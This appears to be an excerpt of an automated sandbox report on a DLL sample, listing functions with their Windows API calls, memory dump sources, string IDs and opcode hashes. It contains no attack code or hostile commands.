                                                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                          • String ID: void
                                                          • API String ID: 1480779885-3531332078
                                                          • Opcode ID: ec9a5445f0e19512f70b993e6688dd13442cb7224597a07ffc56c17ec9e7a68b
                                                          • Instruction ID: 2a3214c89230bf8e3fbc6590051865e996aeb934be1f692edcf6bff42221fb3e
                                                          • Opcode Fuzzy Hash: ec9a5445f0e19512f70b993e6688dd13442cb7224597a07ffc56c17ec9e7a68b
                                                          • Instruction Fuzzy Hash: 6C118271B1420AAFD709DB68C898BEE7BB49B01745F044098D4569B791DF70AA4ACB42
                                                          Function 6CF7C850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7C88F
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7C895
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF7C8A0
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF7C8D5
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7C8E1
                                                          • std::tr1::_Xweak.LIBCPMT ref: 6CF7CB1C
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7CB39
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7CB49
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7CB4F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                          • String ID:
                                                          • API String ID: 1774866819-0
                                                          • Opcode ID: b006972a58c05d39e2965c336aa891140ced2154f91ced985b6bac618076ec1b
                                                          • Instruction ID: a3a95d9deddd9987c1aa49d55f4950571030cf43f5f15a4f494b5c1516a3647a
                                                          • Opcode Fuzzy Hash: b006972a58c05d39e2965c336aa891140ced2154f91ced985b6bac618076ec1b
                                                          • Instruction Fuzzy Hash: F8B13975A006099FCB24DFA9C884EAAB7F5FF8D310F15856DE506ABB91C634F841CB60
                                                          Function 6CF73F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF73F7B
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF73F8D
                                                          • VariantInit.OLEAUT32(?), ref: 6CF73FB7
                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF73FD0
                                                          • VariantClear.OLEAUT32(?), ref: 6CF740C9
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74105
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF74123
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74157
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74168
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
                                                          • String ID:
                                                          • API String ID: 758290628-0
                                                          • Opcode ID: 60d88536b721682ffd6e843b8f4305aca0326e9d34bdeba0f43d4c5d74d03af1
                                                          • Instruction ID: 5d1af0471e6e782c39e515c99073e01a36efe397a00e6ceed56c9d53c18c24e9
                                                          • Opcode Fuzzy Hash: 60d88536b721682ffd6e843b8f4305aca0326e9d34bdeba0f43d4c5d74d03af1
                                                          • Instruction Fuzzy Hash: 467199722093829FC711DF68C8C495BBBF8BB99304F154A6EF195C7650C771E849CBA2
                                                          Function 6CF5FC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,CA0C7769), ref: 6CF5FC98
                                                          • CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,CA0C7769), ref: 6CF5FCAD
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,CA0C7769), ref: 6CF5FCB7
                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,CA0C7769), ref: 6CF5FCBA
                                                          • CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,CA0C7769), ref: 6CF5FD01
                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,CA0C7769), ref: 6CF5FD14
                                                          • GetLastError.KERNEL32(?,?,00000000,CA0C7769), ref: 6CF5FD2A
                                                          • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,CA0C7769), ref: 6CF5FD6B
                                                          • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,CA0C7769), ref: 6CF5FD98
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
                                                          • String ID:
                                                          • API String ID: 1303881157-0
                                                          • Opcode ID: c0fca9a7204477b85c2c23b39fc3638773a6c2016b6c8355b1775be8dbc55613
                                                          • Instruction ID: 214fdf615a9bc5f9e8cb3740fbdd514aff60b9da845a2c6f3070ad9ea14d5ff7
                                                          • Opcode Fuzzy Hash: c0fca9a7204477b85c2c23b39fc3638773a6c2016b6c8355b1775be8dbc55613
                                                          • Instruction Fuzzy Hash: C75117B2A04301ABDB408F34C888B567BA5AF49364F6586E8EE14CF7C5D770D915CBA0
                                                          Function 6CFB42B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CFB42DD
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • _memmove.LIBCMT ref: 6CFB4363
                                                          • _memmove.LIBCMT ref: 6CFB4381
                                                          • _memmove.LIBCMT ref: 6CFB43E6
                                                          • _memmove.LIBCMT ref: 6CFB4453
                                                          • _memmove.LIBCMT ref: 6CFB4474
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                          • String ID: vector<T> too long
                                                          • API String ID: 4034224661-3788999226
                                                          • Opcode ID: 91a8cf0ae6d1a5af0175b5283d906394f79902ef019cbf194a8ec191b1aa7884
                                                          • Instruction ID: e9df65e4b03851da8ef0ce05b10302c39ec66212a957cb219aa6de93184da89c
                                                          • Opcode Fuzzy Hash: 91a8cf0ae6d1a5af0175b5283d906394f79902ef019cbf194a8ec191b1aa7884
                                                          • Instruction Fuzzy Hash: 275191B27042028FC718CF69DD84D6BB7E5EBD4214F184E2DE886D3744EB75E908CAA1
                                                          Function 6CF84B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                          • String ID: invalid string position$string too long
                                                          • API String ID: 2168136238-4289949731
                                                          • Opcode ID: 9ff468e532e4114678da72e95476ab74320233586848e1d26c5e51244d695e4a
                                                          • Instruction ID: a1902b08648421af0b66615b187cd3fc715b44795ea815e92f273fcaba144279
                                                          • Opcode Fuzzy Hash: 9ff468e532e4114678da72e95476ab74320233586848e1d26c5e51244d695e4a
                                                          • Instruction Fuzzy Hash: FC4183733066508BD324CE1DE8A0E5EFBFDEB96754B210A1EF051C7E90DB619C858762
                                                          Function 6CF6FFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID: RSDi
                                                          • API String ID: 4225690600-559181253
                                                          • Opcode ID: 175c973b71dd70846995552a3fc570325724cfe895919fdb0b34ff42df3106fb
                                                          • Instruction ID: b93884c8c75af2986b9bfcb95cb61d8d186e6dcf9f2d6d8c4baebad1ef9a5a17
                                                          • Opcode Fuzzy Hash: 175c973b71dd70846995552a3fc570325724cfe895919fdb0b34ff42df3106fb
                                                          • Instruction Fuzzy Hash: 76414A74A01604DFCB10CFA9D984E5EB7FAAF89304F20818AE509DB755DB72E841CF60
                                                          Function 6CF70815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID: RSUa
                                                          • API String ID: 4225690600-2086061799
                                                          • Opcode ID: 959972c9b27735ce92dcad6a12d7e04e81905740e181183f048c685fd0a2250a
                                                          • Instruction ID: 13167d4aebca25450b3f4ec8c7289ddef452833dc7b0a151dae13b23590d0754
                                                          • Opcode Fuzzy Hash: 959972c9b27735ce92dcad6a12d7e04e81905740e181183f048c685fd0a2250a
                                                          • Instruction Fuzzy Hash: B3312A70E01618DFDB50CF69D984B5EB7B9AF89304F20859AE418E7651CB72ED81CF60
                                                          Function 6CF706F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID: RSqb
                                                          • API String ID: 4225690600-347567867
                                                          • Opcode ID: fb49f678ec1bd7d87bb7421a8b8be8b64401797d3c45abd0fa56727aed406cf9
                                                          • Instruction ID: b703e8dad057b5426c38907beda5cdaa420576cad24ebb3fe3433da99157407c
                                                          • Opcode Fuzzy Hash: fb49f678ec1bd7d87bb7421a8b8be8b64401797d3c45abd0fa56727aed406cf9
                                                          • Instruction Fuzzy Hash: FD314B70A01608DFCB10CFA9DD84B9EB7F9AF89304F20859AE418E7641DB76DD818F60
                                                          Function 6CF70787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID: RSa
                                                          • API String ID: 4225690600-3169278968
                                                          • Opcode ID: adcf9c45ef020b87832ebb7f8308da659c9fb6055d0a8a9b9e0666c964356020
                                                          • Instruction ID: 2b99e1a23a6a9abb4cefe85f6c1e59ea337a973a1882f7a37bf13feb8cb51a6a
                                                          • Opcode Fuzzy Hash: adcf9c45ef020b87832ebb7f8308da659c9fb6055d0a8a9b9e0666c964356020
                                                          • Instruction Fuzzy Hash: ED314BB0A01608DFCB10DFA9DD84B5EB7B9AF89304F20859AE418E7641CB76ED418F60
                                                          Function 6CF7012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID: RS:h
                                                          • API String ID: 4225690600-3891202347
                                                          • Opcode ID: c9c33b9b939590acbbc0fa6b426fa34a1a6f1de0f8f02cf4ee693eb627cdc417
                                                          • Instruction ID: 4ea776c74c1acadc7c5fb6ffa3f809dceff01d543d199d6e62f45b6094bf77b5
                                                          • Opcode Fuzzy Hash: c9c33b9b939590acbbc0fa6b426fa34a1a6f1de0f8f02cf4ee693eb627cdc417
                                                          • Instruction Fuzzy Hash: D9313D70E01608DFDB10DF69DC84B5EB7B9AF89204F208596E419E7651CB72DD418F60
                                                          Function 6CF70237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID: RS3g
                                                          • API String ID: 4225690600-2794631155
                                                          • Opcode ID: a2e6ddabbed77608d841e26d995fc205e99db2b1e10e40a212ee93cd3cdda806
                                                          • Instruction ID: 12723b9af53ccd37dc1cc397af72781453392cda761e3886a3f3729152fb880f
                                                          • Opcode Fuzzy Hash: a2e6ddabbed77608d841e26d995fc205e99db2b1e10e40a212ee93cd3cdda806
                                                          • Instruction Fuzzy Hash: 6D312CB1A01618DFCB10CFA9DD84B5DB7F9AF89204F208696E418E7651CB72D941CF60
                                                          Function 6CFAC760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • type_info::operator!=.LIBCMT ref: 6CFAC7EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
